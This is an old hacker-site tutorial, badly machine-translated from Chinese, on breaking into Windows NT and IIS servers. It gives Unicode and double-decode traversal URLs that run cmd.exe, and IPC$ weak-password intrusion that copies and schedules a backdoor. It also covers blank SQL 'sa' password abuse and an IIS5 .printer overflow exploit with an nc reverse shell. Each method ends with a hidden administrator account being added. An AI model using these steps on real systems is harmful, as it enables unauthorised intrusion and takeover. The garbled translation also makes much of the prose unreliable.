The NT loophole summarizes and uses |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  The hacker file>>invasion analyzesthe >>NT loophole summary 
                  and the use  Printing

            NT loophole summary and use
            Www.cshu.net  2002-12-17  fog rain village 

              Ha-ha, beforehand alliance essence has this article, always feels 
              very good: ) 
              Wants is this kind of familiar flavor, good beautiful ~~~ 
              I with a placard NT loophole summary! Xhacker yesterday evening 
              also educated me to study the technology well: ) Ha-ha 

              1. codes loopholes invade 
              1.unicode invasion 
              Principle: Because IIS in explained when unicode code code and so 
              on %c1%1c explained/creates the browser to break through the 
              lowest level jurisdiction, visits the hard disk content. 
              Operation method as follows: 
              Http://127.0.0.1/scripts/.. %c1%1c.... em32/cmd.exe? /c dir 
              Above operated can visit the main engine the c plate. 
              (Jurisdiction is IUSER_machinename) 
              2.IIS CGI filename wrong decoding loophole 
              Principle: IIS may carry out the CGI procedure when the increase, 
              can carry on two times of decodings. The first decoding is carries 
              on the http decoding to the CGI filename, then judges this 
              filename whether for can the execution file, after for example the 
              inspection decorate whether is "exe" or "com" and so on. In 
              filename inspection through after, IIS can again carry on the 
              second decoding. In the normal condition, should only carry on the 
              decoding to this CGI parameter, however, IIS wrongly already has 
              decoded the CGI filename and the CGI parameter carries on together 
              the decoding. Thus, the CGI filename wrongly has been decoded two. 

              For example: IIS can.. the %255c explanation be../ 
              Operation method as follows: 
              Http://127.0.0.1/scripts/.. %255c.. %.. em32/cmd.exe? /c dir 
              Above operated can visit the main engine the c plate. 
              (Jurisdiction is IUSER_machinename) 
              2. weak passwords or the password are the spatial invasion 
              1.IPC weak password invasion 
              Principle: Because certain network administrators safely realize 
              the difference, the establishment manager password too simple or 
              the manager password for is spatial, after establishes the IPC 
              connection to carry on the simple password test to obtain the 
              manager jurisdiction. 
              Operation method as follows: 
              C:\>net use \\127.0.0.1\ip "password" /user: "username" 
              C:\>copy srv.exe \\127.0.0.1\admin$\system32\srv.exe 
              C:\>net time 
              C:\>at \\127.0.0.1 time srv.exe 
              C:\>telnet 127.0.0.199 
              Login 127.0.0.1 
              C:\>net user newboys 12,345 /add 
              The command completed successfully. 
              C:\>net localgroup administrators newboys /add 
              The command completed successfully. 
              If on operated based on opposite party main engine has opened the 
              IPC sharing, and had admin jurisdiction user username as well as 
              password. Opposite party also must open the Schedule service (is 
              may use at to order). 
              2.SQL SERVER tacitly approves the manager (sa) the password is the 
              spatial invasion 
              Principle: Because MS SQL SERVER tacitly approves the manager (sa) 
              the password for is spatial, and the sa jurisdiction is system. 
              Operation method as follows: 
              Opens the time, pressed the CTRL+R key to appear the main engine 
              scanning establishment dialog box. Infiltrates starts the address, 
              as well as conclusion address. The choice main engine type is SQL, 
              according to determination. The time can the automatic scan 
              designation webpage main engine 1,433 ports whether are starting. 
              If is opening, can automatically survey sa to tacitly approve the 
              password for is whether spatial. (Note: 1,433 ports this SQL 
              tacitly approves the port) if the time discovered sa has the weak 
              password or the password for spatial, by now you were allowed to 
              use the SQL long-distance order tool which the time brought to be 
              good. (Quick key is CTRL+Q) 
              SQLCMD>net user newboys 12,345 /add 
              The command completed successfully. 
              SQLCMD>net localgroup administrators newboys /add 
              The command completed successfully. 
              If on operates the time to be allowed in www.netxeyes.net or 
              www.netxeyes.org? . wboys recommendation use. 
              3. Overflow invasion 
              1.IIS overflow invasion 
              Principle: Tacitly approves in the situation, after the IIS 5.0 
              servers have to decorate are the "printer" application procedure 
              mappings, this mapping use is located under \WINNT\System32\ named 
              msw3prt.dll the dynamic storehouse document. This function is uses 
              in based on the Web control network printing, is Windows2000 is 
              the application procedure function which Internet Printing 
              Protocol (IPP) the agreement establishes. Unfortunately, this 
              mapping has a buffer overflow mistake, may cause 
              Inetinfo.exe makes a mistake, allows the hacker to gain the server 
              through web the management jurisdiction, the hacker makes printer 
              ISAPI to request, when Http the host parameter value achieved when 
              420 characters, can have the buffer overflow: 
              GET /NULL.printer HTTP/1.0 
              Host: [ buffer ] 
              When above [ buffer ] the value character number achieved when 
              420, the buffer overflows. 
              Operation method as follows: 
              1st, first in this machine operates a monitor port with NC. 
              C:\>nc -l -p 99 
              2nd, moves IIS5Exploit 
              D:\> IIS5Exploit xxx.xxx.xxx.xxx 211.152.188.199 
              ===========IIS5 English Version Printer Exploit. =========== 
              ===Written by Assassin 1995-2001.http://www.netXeyes.com=== 
              Connecting 211.152.188.1.. OK. 
              Send Shell Code.. OK 
              IIS5 Shell Code Send OK 
              211.152.188.1 directional local IP. 
              Waits a bit the moment, if succeeds in this machine NC naval 
              vessel port appears: 
              C:\>nc -l -p 99 
              Microsoft Windows 2,000 [ Version 5.00.2195 ] 
              (C) Copyright 1985-1999 Microsoft Corp. 
              C:\> 
              May execute the order. For example: 
              C:\>net user newboys 12,345 /add 
              The command completed successfully. 
              C:\>net localgroup administrartors newboys /add 
              The command completed successfully. 
              Like this founded to belong to Administrator the group user 
              newboys, the password is 12345. 
              Above uses the procedure is IIS5 Printer Exploit similarly may go 
              to www.netxeyes.net or the www.netxeyes.org downloading. 

              These all are I is invading the method which the NT server is 
              commonly used arrives, certainly also must depend on your cerebrum 
              analysis, grasps you the synthesis:) Thank xhacker and instructs 
              to my education through criticism, Arab League nine apologizes:)


              Original author: Nine cities become 
              Origin: Www.scuc.net 
              Altogether has 186 readers to read this article 

              [Tells friend] 
            Previous article:PC-cillin pop3trap.exe buffer overflow loophole 

            Next article: Already did not have 

            - this week popular article - related article 
            The nc.exe high-level skill application compiles
            QQ attack code
            Hacker technology (use of the DEBUG loophole)
            Invades the hypothesized main engine the simple plan
            The local area network winds viral invasion principle and its guard 
            method
            The security receives in OutLook not the security appendix
            NT loophole summary and use



      CSHU 
